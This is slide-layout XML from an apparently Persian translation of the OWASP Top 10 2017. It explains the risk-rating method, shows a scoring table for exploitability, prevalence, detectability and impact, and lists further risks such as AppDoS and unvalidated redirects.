                        <a:rPr lang="fa-IR" sz="950" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t> که با هر دسته </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>TOP 10</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="950" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t> ترکیب شده است محاسبه شده است.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="just" defTabSz="914400" rtl="1" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="950" b="1" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>توجه:</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="950" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t> این دیدگاه درباره احتمال عامل تهدید به یک حساب کاربری صحبت نمی‌کند. و همچنین هیچکدام از جزئیات دقیق در ارتباط با یک برنامه ی خاص را به حساب نمی آورد.هرکدام از این فاکتورهای میتوانند به صورت ویژه احتمال کلی اینکه یک مهاجم یک آسیب پذیری خاص را محاسبه کرده و از آن سو استفاده کند.این امتیازدهی تاثیر واقعی روی کسب و کار شما را به حساب نمی آورد.سازمان شما باید تصمیم بگیرد که چه مقدار خطر امنیتی از برنامه ها و </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>API </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="950" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t> ها را میتواند بپذرید ، با توجه به فرهنگ شما ، صنعت و محیط . هدف </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>OWASP TOP 10 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="950" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t> این نیست که آنالیز این خطرها را برای شما انجام دهد. در ادامه توضیح محاسباتی ما برای ریسک در مورد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 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR"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تنظیمات امنیتی اشتباه</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r>
                        <a:rPr lang="fa-IR" sz="950" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> را خواهیم داشت.</a:t>
                      </a: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3492809960"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="121920" y="6164417"/>
          <a:ext cx="6629400" cy="2786400"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1104900">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1104900">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1104900">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20002"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1104900">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20003"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1104900">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20004"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1104900">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20005"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="669600">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525600">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1000" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>ویژه برنامه کاربردی</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a-IR" sz="1000" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>قابلیت بهره‌برداری</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1000" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>ساده : ۳</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fa-IR" sz="1000" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>شیوع</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p>
                      <a:pPr marL="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1"/>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1000" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>شایع : ۳</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fa-IR" sz="1000" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>قابلیت کشف</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p>
                      <a:pPr marL="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1"/>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1000" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>ساده : ۳</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fa-IR" sz="1000" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>تکنیکی</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1000" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>متعادل : ۲</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fa-IR" sz="1000" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>مختص کسب و کار</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1591200">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en-US" sz="2000" b="1" kern="0" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="00B050"/>
                          </a:solidFill>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t/>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="2000" b="1" kern="0" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="00B050"/>
                          </a:solidFill>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1800" b="1" kern="0" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="00B050"/>
                          </a:solidFill>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t>میانگین = </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="900"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1800" b="1" kern="0" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="00B050"/>
                          </a:solidFill>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t>۳</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bl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="Rectangle 28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3744036" y="8541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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="2400" b="1" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>۶</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pPr algn="ctr" rtl="1"/>
            <a:r>
              <a:rPr lang="fa-IR" dirty="0" smtClean="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>یادداشتی در مورد ریسک ها</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0">
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="30" name="Gruppieren 29"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="129415" y="6310683"/>
            <a:ext cx="5897010" cy="388800"/>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74631"/>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26280" y="68239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05337" y="7619545"/>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3311868732"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="939599"/>
          <a:ext cx="6858000" cy="1443465"/>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4800">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="r" rtl="1">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1600" b="1" dirty="0">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>خلاصه ۱۰ فاکتور ریسک برتر</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1106025">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="r" defTabSz="914400" rtl="1" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>جدول پیش رو خلاصه ای از ۱۰ خطر برتر امنیتی ۲۰۱۷ و فاکتورهای ریسکی که ما به انها اضافه نموده‌ایم را نمایش میدهد. این فاکتورها بر اساس آمارهای قابل دسترس و همینطور تجربه ی تیم </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>OWASP TOP 10 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> تعیین شده اند.برای درک این خطرها برای برنامه یا سازمان، باید تهدیدات داخلی و تاثیرات کسب و کار خود را مورد نظر قرار دهید. حتی ضعف های امنیتی شدید هم ممکن است خطر جدی به همراه نداشته باشند ، اگر که هیچ تهدیدی در موقعیت حمله قرار نداشته باشد و یا تاثیر کسب و کار بر دارایی هایی که مشمول هستند ناچیز باشد.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="00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3147356249"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="7048812"/>
          <a:ext cx="6858000" cy="2853376"/>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4800">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="r">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1600" b="1" dirty="0">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>ریسک اضافه قابل توجه</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0"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="2515936">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="r" defTabSz="914400" rtl="1" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>TOP 10</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> زمینه های بسیاری را پوشش میدهد، اما ریسک های دیگری نیز وجود دارند که باید آنها را در نظر داشته و در سازمان خود ارزیابی نمایید.بعضی از اینها در نسخه های قبلی </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>TOP 10 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> وجود دارند و برخی نه، که شامل تکنیک های جدید حمله که همیشه شناسایی میشوند است. مابقی ریسک های امنیتی برنامه کاربردی (به ترتیب </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>CVE-ID</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>) که شما باید به صورت اضافی در نظر بگیرید شامل این موارد هستند :</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="r" defTabSz="914400" rtl="1" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="11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4"/>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1000" baseline="0" dirty="0" err="1">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId5"/>
                        </a:rPr>
                        <a:t>AppDoS</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId5"/>
                        </a:rPr>
                        <a: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8"/>
                        </a:rPr>
                        <a:t>CWE-601: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId8"/>
                        </a:rPr>
                        <a:t>Unvalidated</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId8"/>
                        </a:rPr>
                        <a:t> Forward and Redirects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1"/>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877382471"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1" y="2383064"/>
          <a:ext cx="6858001" cy="4575325"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1163955">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="869889">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="810090">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20002"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="855095">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20003"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1125125">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20004"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="675075">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20005"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="900100">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20006"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="458672">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20007"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="669958">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr">
                        <a:lnSpc>
                          <a:spcPct val="90000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1700" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>ریسک</a:t>
                      </a:r>
